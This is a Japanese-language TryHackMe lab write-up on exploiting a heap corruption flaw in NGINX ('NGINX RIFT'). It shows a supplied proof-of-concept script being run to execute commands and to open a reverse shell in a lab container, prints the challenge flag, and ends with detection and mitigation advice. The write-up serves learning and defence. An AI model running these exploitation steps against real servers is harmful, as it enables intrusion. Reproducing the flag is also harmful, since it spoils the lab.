
このラボは、NGINXに影響を与えるヒープ破損の脆弱性であるCVE-2024-24945の悪用を実証しています。目的は、メモリ破損がどのようにリモートコード実行(RCE)につながるかを理解し、悪用、検出、および緩和技術に関する実践的な経験を積むことでした。
このラボは、CVE-2024-24945(NGINXに影響を与えるヒープ破損の脆弱性)の悪用を実演しています。 目的は、メモリ破損がどのようにリモートコード実行(RCE)につながるかを理解し、 悪用、検出、および緩和技術に関する実践的な経験を得ることでした。
. 脆弱なNGINXサービスの確認 . 提供された概念実証(PoC)を使用して任意のコマンドを実行する . ターゲットコンテナ上でリバースシェルを取得する . チャレンジフラグを取得する . 検出と緩和戦略を理解する
. プラットフォーム: TryHackMe . ターゲットサービス: NGINX RIFT . コンテナ化環境: Docker . エクスプロイトツール: poc.py . アクセス方法: VNC (Virtual Network Computing)
サービス確認
脆弱なコンテナが実行中でアクセス可能であることを確認
sudo docker ps
curl -s http://127.0.0.1:19321/api/users/42
バックエンド OK
提供されたPoCを実行して任意のコマンド実行を検証した。
pytho3 poc.py --cmd 'echo hello from depthfirst > /tmp/pwned
正常な実行を確認:
sudo docker exec nginx-rift-nginx-1
cat /tmp/pwned
出力: hello from depthfirst
ターゲットコンテナ上にインタラクティブシェルを確立する。
python3 poc.py --shell
Successful Connection:
[] listening for reverse shell on port 1337... [] connected. $
チャレンジフラグにアクセスした。
cat /flag.txt
THM{18_y34r_%t4t3_m15m4tch_rip5_th3_h34p}
防御者は以下の方法で悪用の試みを特定できる:
. NGINXワーカーのクラッシュ . セグメンテーションフォールトイベント . 予期しない外部ネットワーク接続 . 疑わしいシェルプロセス (/bin/sh,bash) . 一時ディレクトリへの不正なファイル作成
. パッチ適用済みのNGINXバージョンにアップグレードする。 . 最小権限の原則を適用する。 . 不要な外部ネットワークトラフィックを制限する 連続的なログ監視を実装する。 . コンテナセキュリティ制御とランタイム監視を使用する
このラボでは以下の実践的な経験を得た:
. ヒープ破損の脆弱性の理解 . リモートコード実行の欠陥の悪用 . リバースシェルの確立 . ポストエクスプロイト検証の実行 . 侵害指標(IoC)と緩和技術の認識
この演習は、教育および防御的なサイバーセキュリティトレーニング目的のみのために、管理されたTryHackMeラボ環境で実施されました。
著者: [Benedict Ejepu Amaechi] プラットフォーム: TryHackMe トピック: CVE-2024-24945 9NGINX RIFT0 悪用と防御 完了日: 2026年6月